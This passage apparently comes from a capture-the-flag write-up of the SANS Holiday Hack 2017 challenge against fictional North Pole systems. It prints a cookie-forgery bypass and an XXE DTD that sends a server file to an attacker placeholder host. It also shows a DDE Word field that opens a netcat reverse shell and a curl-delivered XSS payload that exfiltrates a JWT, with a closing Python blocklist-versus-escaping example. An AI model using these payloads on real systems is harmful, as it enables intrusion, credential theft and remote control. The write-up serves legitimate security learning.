&lt;figure class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-js&quot; data-lang=&quot;js&quot;&gt;&lt;span class=&quot;c1&quot;&gt;//FOUND THESE FOR creating and validating cookies. Going to use this in node js&lt;/span&gt;
    &lt;span class=&quot;kd&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;nx&quot;&gt;cookie_maker&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;username&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;nx&quot;&gt;callback&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;){&lt;/span&gt;
        &lt;span class=&quot;kd&quot;&gt;var&lt;/span&gt; &lt;span class=&quot;nx&quot;&gt;key&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;dl&quot;&gt;'&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;need to put any length key in here&lt;/span&gt;&lt;span class=&quot;dl&quot;&gt;'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
        &lt;span class=&quot;c1&quot;&gt;//randomly generates a string of 5 characters&lt;/span&gt;
        &lt;span class=&quot;kd&quot;&gt;var&lt;/span&gt; &lt;span class=&quot;nx&quot;&gt;plaintext&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nx&quot;&gt;rando_string&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;5&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
        &lt;span class=&quot;c1&quot;&gt;//makes the string into cipher text .... in base64. When decoded this 21 bytes in total length. 16 bytes for IV and 5 byte of random characters&lt;/span&gt;
        &lt;span class=&quot;c1&quot;&gt;//Removes equals from output so as not to mess up cookie. decrypt function can account for this without erroring out.&lt;/span&gt;
        &lt;span class=&quot;kd&quot;&gt;var&lt;/span&gt; &lt;span class=&quot;nx&quot;&gt;ciphertext&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nx&quot;&gt;aes256&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;encrypt&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;key&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;nx&quot;&gt;plaintext&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;).&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;replace&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;sr&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\=&lt;/span&gt;&lt;span class=&quot;sr&quot;&gt;/g&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;dl&quot;&gt;''&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
        &lt;span class=&quot;c1&quot;&gt;//Setting the values of the cookie.&lt;/span&gt;
        &lt;span class=&quot;kd&quot;&gt;var&lt;/span&gt; &lt;span class=&quot;nx&quot;&gt;acookie&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;dl&quot;&gt;'&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;IOTECHWEBMAIL&lt;/span&gt;&lt;span class=&quot;dl&quot;&gt;'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;JSON&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;stringify&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;({&lt;/span&gt;&lt;span class=&quot;dl&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;dl&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;username&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;dl&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;plaintext&lt;/span&gt;&lt;span class=&quot;dl&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;plaintext&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;  &lt;span class=&quot;dl&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;ciphertext&lt;/span&gt;&lt;span class=&quot;dl&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;ciphertext&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;}),&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;maxAge&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;86400000&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;httpOnly&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;kc&quot;&gt;true&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span 
class=&quot;na&quot;&gt;encode&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;String&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;}]&lt;/span&gt;
        &lt;span class=&quot;k&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;nx&quot;&gt;callback&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;acookie&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;};&lt;/span&gt;
    &lt;span class=&quot;kd&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;nx&quot;&gt;cookie_checker&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;req&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;nx&quot;&gt;callback&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;){&lt;/span&gt;
        &lt;span class=&quot;k&quot;&gt;try&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
            &lt;span class=&quot;kd&quot;&gt;var&lt;/span&gt; &lt;span class=&quot;nx&quot;&gt;key&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;dl&quot;&gt;'&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;need to put any length key in here&lt;/span&gt;&lt;span class=&quot;dl&quot;&gt;'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
            &lt;span class=&quot;c1&quot;&gt;//Retrieving the cookie from the request headers and parsing it as JSON&lt;/span&gt;
            &lt;span class=&quot;kd&quot;&gt;var&lt;/span&gt; &lt;span class=&quot;nx&quot;&gt;thecookie&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nx&quot;&gt;JSON&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;parse&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;req&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;cookies&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;IOTECHWEBMAIL&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
            &lt;span class=&quot;c1&quot;&gt;//Retrieving the cipher text &lt;/span&gt;
            &lt;span class=&quot;kd&quot;&gt;var&lt;/span&gt; &lt;span class=&quot;nx&quot;&gt;ciphertext&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nx&quot;&gt;thecookie&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;ciphertext&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
            &lt;span class=&quot;c1&quot;&gt;//Retrievingin the username&lt;/span&gt;
            &lt;span class=&quot;kd&quot;&gt;var&lt;/span&gt; &lt;span class=&quot;nx&quot;&gt;username&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nx&quot;&gt;thecookie&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;name&lt;/span&gt;
            &lt;span class=&quot;c1&quot;&gt;//retrieving the plaintext&lt;/span&gt;
            &lt;span class=&quot;kd&quot;&gt;var&lt;/span&gt; &lt;span class=&quot;nx&quot;&gt;plaintext&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nx&quot;&gt;aes256&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;decrypt&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;key&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;nx&quot;&gt;ciphertext&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
            &lt;span class=&quot;c1&quot;&gt;//If the plaintext and ciphertext are the same, then it means the data was encrypted with the same key&lt;/span&gt;
            &lt;span class=&quot;k&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;plaintext&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;===&lt;/span&gt; &lt;span class=&quot;nx&quot;&gt;thecookie&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;plaintext&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
                &lt;span class=&quot;k&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;nx&quot;&gt;callback&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;kc&quot;&gt;true&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;nx&quot;&gt;username&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
            &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;else&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
                &lt;span class=&quot;k&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;nx&quot;&gt;callback&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;kc&quot;&gt;false&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;dl&quot;&gt;''&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
            &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
        &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;catch&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;e&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
            &lt;span class=&quot;nx&quot;&gt;console&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;e&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
            &lt;span class=&quot;k&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;nx&quot;&gt;callback&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;kc&quot;&gt;false&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;dl&quot;&gt;''&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
        &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;};&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;

&lt;p&gt;Examining this implementation, we can see that there is a bug whereby we can supply a ciphertext equal in length to the Initialisation Vector (IV) of the cipher, which in the case of AES-256 is 128 bits (or 16 bytes). Once the IV has been consumed, nothing is left to decrypt, so the decrypted value is an empty string and the equality check evaluates to &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;true&lt;/code&gt; for a zero-length plaintext value.&lt;/p&gt;

&lt;p&gt;Hence, all we have to do is modify our cookie, setting the username to the email account whose inbox we wish to access, leave the plaintext value empty, and set the ciphertext value to 16 arbitrary bytes, base64 encoded. For example, setting our cookie to &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;{&quot;name&quot;:&quot;alabaster.snowball@northpolechristmastown.com&quot;,&quot;plaintext&quot;:&quot;&quot;,&quot;ciphertext&quot;:&quot;AAAAAAAAAAAAAAAAAAAAAA==&quot;}&lt;/code&gt; and refreshing the login page, we are greeted with Alabaster’s inbox.&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;/images/ewa_alabaster_inbox.png&quot;&gt;&lt;img src=&quot;/images/ewa_alabaster_inbox.png&quot; alt=&quot;center&quot; /&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Let this be a lesson; always understand code you find online if you intend to use or adapt it in your own application!&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;This is the answer to Question 4: Elf Web Access (EWA) is the preferred mailer for North Pole elves, available internally at http://mail.northpolechristmastown.com. What can you learn from The Great Book page found in an e-mail on that server?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Snooping through Alabaster’s inbox we find an email from Holly Evergreen with the subject “Lost book page”. Inside is &lt;a href=&quot;http://mail.northpolechristmastown.com/attachments/GreatBookPage4_893jt91md2.pdf&quot;&gt;a link&lt;/a&gt; to page 4 of the Great Book entitled “The Rise of the Lollipop Guild” (SHA1: &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;f192a884f68af24ae55d9d9ad4adf8d3a3995258&lt;/code&gt;). This page tells us of the tension between the Elves and the Munchkins leading up to the Great Schism, the offensive activities of a group of Munchkins calling themselves the Lollipop guild against the North Pole computer and network infrastructure, and even suggests that the Elves have been infiltrated by Lollipop Guild operatives.&lt;/p&gt;

&lt;h2 id=&quot;naughty-and-nice&quot;&gt;Naughty and Nice&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;This is the answer to first part of Question 5: How many infractions are required to be marked as naughty on Santa’s Naughty and Nice list?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Our first data source is a CSV file from the SMB share we discovered earlier, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Naughty and Nice List.csv&lt;/code&gt; which contains a list of names in the first column, and whether they are considered Naughty or Nice.&lt;/p&gt;

&lt;p&gt;Our second data source comes from the North Pole Police Department website, which is publicly accessible at https://nppd.northpolechristmastown.com/. Here, we find an interface for querying infractions. Once a query has been specified, a download link is made available which appends the query parameter &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;json&lt;/code&gt; with value &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;1&lt;/code&gt; to the query string. By conducting a query that will return all infractions, such as &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;title:*&lt;/code&gt; we can download all the infractions in JSON format for easy parsing.&lt;/p&gt;

&lt;p&gt;The JSON data is not yet structured in a format which makes it easy to combine with the Naughty and Nice List in order to work out how many infractions are required for someone to be considered Naughty, so we use the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;jq&lt;/code&gt; tool to group infractions by the name of the person, aggregating into a count, and exporting as a CSV&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;user@machine:~$ jq -r '.infractions | group_by(.name) | .[] | [ .[0].name, (. | length) ] | @csv' infractions.json &amp;gt; infractions_count.csv
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Performing a left join of this output with the Naughty and Nice List, we discover that to be considered naughty, one must have four or more infractions.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Aside from the two insider threat moles Boq Questrian and Bini Aru mentioned in the BOLO Word document from the SMB share, I have yet to figure out how to answer the second part of Question 5: What are the names of at least six insider threat moles?&lt;/strong&gt;&lt;/p&gt;

&lt;h2 id=&quot;north-pole-and-beyond-1&quot;&gt;North Pole and Beyond&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;This is the answer to the third part of Question 5: Who is throwing the snowballs from the top of the North Pole Mountain and what is your proof?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Back in the North Pole and Beyond, in an NPC conversation with Bumble and Sam, we discover that it is the Abominable Snow Monster who has been throwing the snowballs from the top of the North Pole Mountain. However, all may not be as it seems; according to Sam the Snowman, the Abominable Snow Monster doesn’t appear to be acting as himself, and he seems to be under someone else’s control. The plot thickens…&lt;/p&gt;

&lt;h2 id=&quot;elf-as-a-service&quot;&gt;Elf as a Service&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;This is the answer to Question 6: The North Pole engineering team has introduced an Elf as a Service (EaaS) platform to optimize resource allocation for mission-critical Christmas engineering projects at http://eaas.northpolechristmastown.com. Visit the system and retrieve instructions for accessing The Great Book page from C:\greatbook.txt. Then retrieve The Great Book PDF file by following those directions. What is the title of The Great Book page?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The Elf as a Service (EaaS) platform is a web application which allows users to upload an XML file defining orders that elves have placed to fulfil Christmas wishes. By following the guidance in an excellent blog post on the SANS Penetration Testing blog, entitled &lt;a href=&quot;https://pen-testing.sans.org/blog/2017/12/08/entity-inception-exploiting-iis-net-with-xxe-vulnerabilities/&quot;&gt;Exploiting XXE Vulnerabilities in IIS/.NET&lt;/a&gt;, we learn that by hosting a malicious XML Document Type Definition (DTD) file on a web server accessible by this application, and uploading an equally malicious XML document using the application’s built-in functionality for placing orders, we can read arbitrary files on the remote filesystem. We are told that instructions for acquiring another page of the Great Book are located in &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;C:\greatbook.txt&lt;/code&gt; on the server.&lt;/p&gt;

&lt;p&gt;So, we host the following DTD file on a webserver of our choosing&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&amp;lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&amp;gt;
&amp;lt;!ENTITY % stolendata SYSTEM &quot;file:///c:/greatbook.txt&quot;&amp;gt;
&amp;lt;!ENTITY % inception &quot;&amp;lt;!ENTITY &amp;amp;#x25; sendit SYSTEM 'http://MY_IP_ADDRESS:4446/?%stolendata;'&amp;gt;&quot;&amp;gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;and upload the following XML document&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&amp;lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&amp;gt;
&amp;lt;!DOCTYPE demo [
     &amp;lt;!ELEMENT demo ANY &amp;gt;
     &amp;lt;!ENTITY % extentity SYSTEM &quot;http://MY_IP_ADDRESS:4445/evil.dtd&quot;&amp;gt;
     %extentity;
     %inception;
     %sendit;
      ]
&amp;gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;with a netcat listener sitting on port 4446, and we receive the following HTTP request&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;GET /?http://eaas.northpolechristmastown.com/xMk7H1NypzAqYoKw/greatbook6.pdf HTTP/1.1
Host: MY_IP_ADDRESS:4446
Connection: Keep-Alive
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Using this information, we navigate to the specified path in our browser and receive page 6 of the Great Book entitled “The Dreaded Inter-Dimensional Tornadoes” (SHA1: &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;8943e0524e1bf0ea8c7968e85b2444323cb237af&lt;/code&gt;)&lt;/p&gt;

&lt;h2 id=&quot;elf-web-access---phishing-attack&quot;&gt;Elf Web Access - phishing attack&lt;/h2&gt;

&lt;p&gt;Going back to EWA and reading through more of the exchanges there, it seems that Alabaster Snowball is desperate for some of Mrs. Claus’s gingerbread cookies. So desperate, in fact, that he claims that he would be willing to download any Microsoft Word docx file that he is sent (in an email on the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;mail.northpolechristmastown.com&lt;/code&gt; system containing the phrase “gingerbread cookie recipe”), open it, and click through any prompts that appear. In another email, he also reveals that he is on a workstation with PowerShell installed, and netcat in his path. I feel a phishing attack brewing.&lt;/p&gt;

&lt;p&gt;To this end, we send him a Word document with a Dynamic Data Exchange (DDE) exploit in it (which, in an email exchange, Minty Candycane later warns him about) containing the following DDEAUTO field &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;DDEAUTO c:\\windows\\system32\\cmd.exe &quot;/k nc.exe MY_IP_ADDRESS 4445 -e cmd.exe&quot;&lt;/code&gt; which, combined with a netcat listener, gives us a shell on his machine.&lt;/p&gt;

&lt;p&gt;Using this, we can exfiltrate page 7 of the Great Book, entitled “Regarding the Witches of Oz” (SHA1: &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;c1df4dbc96a58b48a9f235a1ca89352f865af8b8&lt;/code&gt;)&lt;/p&gt;

&lt;h2 id=&quot;elf-database&quot;&gt;Elf Database&lt;/h2&gt;

&lt;p&gt;Next, we are asked to penetrate the Elf Database, at &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;http://edb.northpolechristmastown.com&lt;/code&gt; on the internal network behind the Letters to Santa system. Navigating to this URL, we find another web application protected behind a login page. After trying the obvious combinations derived from credentials we have already discovered on related systems, we turn our attention to a support link on the login page for users who have forgotten their username and password.&lt;/p&gt;

&lt;p&gt;We are presented with a form that asks for our username, email address, and a message to the support staff. Rudimentary attempts at performing a cross-site scripting (XSS) attack against the message field under the username &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;alabaster_snowball&lt;/code&gt; are met first of all with a helpful validation failure informing us that the format of our username is incorrect and should be of the form &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;first.last&lt;/code&gt;. How helpful!&lt;/p&gt;

&lt;p&gt;Attempting again as &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;alabaster.snowball&lt;/code&gt; gives us the rather interesting pop-up message containing “Alert, Hacker!”, but as it turns out this is just client-side validation which can be bypassed by posting directly to the right endpoint… Almost.&lt;/p&gt;

&lt;p&gt;Unfortunately, sending the XSS payload directly to the server shows that there is also some server-side string replacement in place, for example the string &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;&amp;lt;script&amp;gt;&lt;/code&gt; gets replaced with &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;&amp;lt;&amp;gt;&lt;/code&gt;. Consulting the OWASP cheat sheet for XSS mitigation bypasses, we try a different tack, by sending an &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;img&lt;/code&gt; tag with its &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;onerror&lt;/code&gt; attribute set to some JavaScript that &lt;em&gt;will&lt;/em&gt; execute.&lt;/p&gt;

&lt;p&gt;We abuse this to steal the authentication JWT of the user visiting the support page (kept in their browser’s local storage, as we learn from inspecting the web application’s source code) by making the following request&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;curl &quot;http://edb.northpolechristmastown.com:4003/service&quot; -H &quot;Host: edb.northpolechristmastown.com:4003&quot; -H &quot;User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0&quot; -H &quot;Accept: */*&quot; -H &quot;Accept-Language: en-GB,en;q=0.5&quot; --compressed -H &quot;Referer: http://edb.northpolechristmastown.com:4003/index.html&quot; -H &quot;Content-Type: application/x-www-form-urlencoded; charset=UTF-8&quot; -H &quot;X-Requested-With: XMLHttpRequest&quot; -H &quot;Cookie: SESSION=xH8h46s9134Evn5Hgr4Z&quot; -H &quot;Connection: keep-alive&quot; -H &quot;Pragma: no-cache&quot; -H &quot;Cache-Control: no-cache&quot; --data 'uid=alabaster.snowball' --data-urlencode 'email=alabaster.snowball@northpolechristmastown.com'  --resolve edb.northpolechristmastown.com:4003:127.0.0.1 --data-urlencode &quot;message=&amp;lt;img src=x onerror=this.src='http://MY_IP_ADDRESS:4446/?token='+localStorage.getItem('np-auth')&amp;gt;&quot; 
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;which results in us receiving the following request&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;GET /?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiRW5naW5lZXJpbmciLCJvdSI6ImVsZiIsImV4cGlyZXMiOiIyMDE3LTA4LTE2IDEyOjAwOjQ3LjI0ODA5MyswMDowMCIsInVpZCI6ImFsYWJhc3Rlci5zbm93YmFsbCJ9.M7Z4I3CtrWt4SGwfg7mi6V9_4raZE5ehVkI9h04kr6I HTTP/1.1
Referer: http://127.0.0.1/reset_request?ticket=UP4XU-R52T0-I50UF-K868U
User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1
Accept: */*
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Accept-Language: en-US,*
Host: MY_IP_ADDRESS:4446
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
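&lt;p&gt;As an added example (not code from the original write-up), the following Python reconstructs the kind of blocklist the page describes and contrasts it with output encoding. &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;naive_filter&lt;/code&gt;, the ticket markup and the tag check are assumptions for illustration, not the Elf Database’s real code; the payload is the one sent above.&lt;/p&gt;

```python
import html
import re

# The page's payload: an <img> whose onerror handler ships the JWT out of localStorage.
PAYLOAD = ("<img src=x onerror=this.src='http://MY_IP_ADDRESS:4446/?token='"
           "+localStorage.getItem('np-auth')>")


def naive_filter(message: str) -> str:
    """Assumed reconstruction of the server-side blocklist the page describes:
    only the literal string '<script>' is rewritten to '<>'. Nothing else is touched."""
    return message.replace("<script>", "<>")


def render_ticket_vulnerable(message: str) -> str:
    # The filtered text is concatenated straight into markup, so any other tag survives.
    return "<div class='ticket'>" + naive_filter(message) + "</div>"


def render_ticket_hardened(message: str) -> str:
    # Output encoding instead of a blocklist: '<', '>', '&' and quotes become entities,
    # so user text can never open a tag or break out of an attribute.
    return "<div class='ticket'>" + html.escape(message, quote=True) + "</div>"


_OPENING_TAG = re.compile(r"<\s*[a-z][a-z0-9]*", re.IGNORECASE)


def ticket_body_has_tag(rendered: str) -> bool:
    """Does the user-controlled part of the rendered ticket still contain an opening tag?"""
    body = rendered[len("<div class='ticket'>"):-len("</div>")]
    return _OPENING_TAG.search(body) is not None
```

&lt;p&gt;The blocklist stops exactly one spelling of one tag; case variants and every other element pass through untouched, while encoding for the HTML context neutralises all of them. Keeping the bearer token in an HttpOnly cookie rather than local storage would also have left this XSS with nothing to steal.&lt;/p&gt;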

